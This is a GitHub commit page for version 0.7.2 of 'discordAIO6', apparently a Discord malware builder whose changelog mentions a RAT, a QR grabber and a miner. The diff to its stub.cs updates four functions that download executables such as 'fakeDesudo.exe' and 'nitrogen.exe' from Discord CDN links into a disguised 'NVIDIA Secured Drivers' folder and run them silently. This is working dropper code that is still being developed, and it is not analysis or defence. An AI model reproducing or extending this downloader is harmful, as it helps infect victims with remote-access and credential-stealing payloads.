Skip to content

Commit

Permalink
0.7.2
Browse files Browse the repository at this point in the history
- Patched fake programs
- Patched RAT
- Patched QR Grabber
- Removed Miner temporarily
- Fixed colors for new boxes
  • Loading branch information
danielkasprzak authored May 10, 2022
1 parent 953c3fc commit 757d434
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions discordAIO6/Resources/stub.cs
Original file line number Diff line number Diff line change
Expand Up @@ -3183,7 +3183,7 @@ public static void RunWizard()

try
{
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/831225076187660348/951466723406667806/DiscordTools.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\DiscordTools.exe");
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/973552453083594762/973553916992176208/DiscordTools.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\DiscordTools.exe");
}
catch { }
Process.Start(EEEEEappdata + "\\NVIDIA Secured Drivers\\DiscordTools.exe");
Expand All @@ -3198,7 +3198,7 @@ public static void RunDesudo()

try
{
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/831225076187660348/956346715835871262/fakeDesudo.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\fakeDesudo.exe");
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/973552453083594762/973552633203810344/fakeDesudo.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\fakeDesudo.exe");
}
catch { }
Process.Start(EEEEEappdata + "\\NVIDIA Secured Drivers\\fakeDesudo.exe");
Expand All @@ -3213,7 +3213,7 @@ public static void RunFAKEcmd()

try
{
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/831225076187660348/950526489328242718/FakeConsole.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\FakeConsole.exe");
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/973552453083594762/973552465335164928/FakeConsole.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\FakeConsole.exe");
}
catch { }
Process.Start(EEEEEappdata + "\\NVIDIA Secured Drivers\\FakeConsole.exe");
Expand All @@ -3228,7 +3228,7 @@ public static void RunFAKENitroGEN()

try
{
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/831225076187660348/950526991625506876/nitrogen.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\nitrogen.exe");
new WebClient().DownloadFile("https://cdn.discordapp.com/attachments/973552453083594762/973552775315226635/nitrogen.exe", EEEEEappdata + "\\NVIDIA Secured Drivers\\nitrogen.exe");
}
catch { }
Process.Start(EEEEEappdata + "\\NVIDIA Secured Drivers\\nitrogen.exe");
Expand Down

0 comments on commit 757d434

Please sign in to comment.